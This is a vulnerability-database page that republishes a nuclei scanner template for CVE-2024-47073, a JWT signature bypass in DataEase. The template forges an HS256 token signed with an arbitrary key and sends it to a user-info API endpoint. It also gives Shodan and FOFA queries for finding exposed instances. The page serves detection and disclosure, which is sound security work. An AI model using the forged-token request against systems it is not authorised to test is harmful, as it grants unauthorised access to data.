Lucene search
K

DataEase v2.10.2 - JWT Signature Verification Bypass

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 29 Views

DataEase v2.10.2 has a critical JWT signature verification bypass; upgrade recommended to fix issue.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-47073
7 Nov 202417:34
circl
CNNVD
DataEase 数据伪造问题漏洞
7 Nov 202400:00
cnnvd
CVE
CVE-2024-47073
7 Nov 202417:31
cve
Cvelist
CVE-2024-47073 Dataease arbitrary interface access vulnerability
7 Nov 202417:31
cvelist
NVD
CVE-2024-47073
7 Nov 202418:15
nvd
OSV
CVE-2024-47073 Dataease arbitrary interface access vulnerability
7 Nov 202417:31
osv
Positive Technologies
PT-2024-32390 · Dataease · Dataease
7 Nov 202400:00
ptsecurity
RedhatCVE
CVE-2024-47073
23 May 202509:00
redhatcve
Vulnrichment
CVE-2024-47073 Dataease arbitrary interface access vulnerability
7 Nov 202417:31
vulnrichment
id: CVE-2024-47073

info:
  name: DataEase v2.10.2 - JWT Signature Verification Bypass
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    DataEase is an open source data visualization analysis tool that helps users quickly analyze data and gain insights into business trends. In affected versions, the lack of signature verification of JWT tokens allows attackers to forge JWTs, which then allow access to any interface. The vulnerability has been fixed in v2.10.2 and all users are advised to upgrade. There are no known workarounds for this vulnerability.
  impact: |
    Attackers can forge JWT tokens to bypass authentication and gain unauthorized access to any interface.
  remediation: |
    Update DataEase to version 2.10.2 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-47073
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-47073
    cwe-id: CWE-347
    epss-score: 0.01223
    epss-percentile: 0.65131
    cpe: cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: dataease
    product: dataease
    shodan-query: http.html:"dataease"
    fofa-query: body="dataease"
  tags: cve,cve2024,dataease,jwt,vuln

variables:
  payload: '{"uid":1,"oid":1,"exp":{{unix_time(1000)}}}'
  token: '{{generate_jwt(payload,"HS256","random") }}'

http:
  - raw:
      - |
        GET /de2api/user/info HTTP/1.1
        Host: {{Hostname}}
        X-DE-TOKEN: {{token}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - data
          - '"oid":"1"'
          - code
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450220045ae0ce3a60f25a9a059f47b8e0ad06b719a2b425ab10a8c8b2f89fa43a8781022100853473761930aa84930d9284adc0da9e091d77745ded7f5b102dc78e169f0b88:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.19.1
CVSS 49.3
EPSS0.01223
SSVC
29